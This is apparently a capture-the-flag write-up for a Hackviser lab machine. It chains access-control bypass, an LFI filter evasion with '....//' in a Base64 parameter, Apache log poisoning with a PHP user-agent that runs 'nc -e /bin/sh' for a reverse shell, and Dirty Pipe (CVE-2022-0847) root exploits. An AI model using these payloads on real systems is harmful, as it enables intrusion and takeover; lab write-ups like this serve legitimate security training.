Impact Scenario Hackviser

impcat : it's Medium Level Scenario in Hackviser You must Exploit LFI and Kernel for Privilege Escalation

Orion

~2 min read · February 25, 2026 (Updated: February 25, 2026) · Free: Yes

Port Scanning

22/tcp open  ssh
80/tcp open  http

Fuzzing

/index.php - 302
/login.php - 200
/logout.php - 302
/register.php

/uploads/
/webadmin/

/webadmin/components/
/webadmin/assets/
/webadmin/tables/

I evaluated the login form for SQLi and ran a dictionary attack; however, both attempts yielded no results

"I created an account and found the first answer, but I'm stuck again."

While checking the Burp history, I noticed that /webadmin/index.php redirects, but it still leaks the content. This allowed me to find the second answer and a new endpoint: tables/datatables.php.

I went back to my account's payment section, which was 'Pending Admin Approval'. I then accessed: GET /webadmin/tables/datatables.php

There, I found a hidden form:

<form action="/../../sendFile.php" method="post">
  <input type="hidden" name="username" value="orion">
  <button type="submit" class="btn btn-success">Confirm</button>
</form>

I manually executed the request using curl:

curl -X POST -d "username=orion" http://impact.hv/sendFile.php

After that, I checked my account again; the payment was already approved. Now, the profile page is accessible at http://impact.hv/profile.php.

"When clicking any of the buttons, the following request is generated:

http://impact.hv/search.php?name=dmVydGV4dGVjaG5vbG9naWVzLnNxbA

The parameter is Base64 encoded. I started testing for LFI (Local File Inclusion), but it was challenging. My initial Base64 encoded payloads didn't work, suggesting a filter was in place. To bypass it, I tried using ....// instead of the standard ../"

....//....//....//....//....//....//....//var/log/apache2/access.log
# Base64
Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c=
GET /search.php?name= HTTP/1.1

The bypass worked. I attempted to access the access.log file, but due to its large size, the server could not handle the request. To resolve this, I had to reload the lab machine."

I Send this to Got Reverse Sehll

curl -A "<?php system('nc -e /bin/sh IP PORT'); ?>" http://impact.hv/curl

Then Create Listener and Sent this Request

GET /search.php?name=Li4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vLi4uLi8vdmFyL2xvZy9hcGFjaGUyL2FjY2Vzcy5sb2c= HTTP/1.1

Then Find the Answer in

cat /home/impact/targets.txt

Privilege Escalation CVE-2022–0847

I used this CVE to be Root You Could Download the Exploit

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

# The First way 
bash complie.sh
./exploit-1

# Second way
./exploit-2 /usr/bin/passwd

#ctf #privilege-escalation #local-file-inclusion #path-traversal #hackvis

Impact Scenario Hackviser

impcat : it's Medium Level Scenario in Hackviser You must Exploit LFI and Kernel for Privilege Escalation

Port Scanning

Fuzzing

Privilege Escalation CVE-2022–0847

Reporting a Problem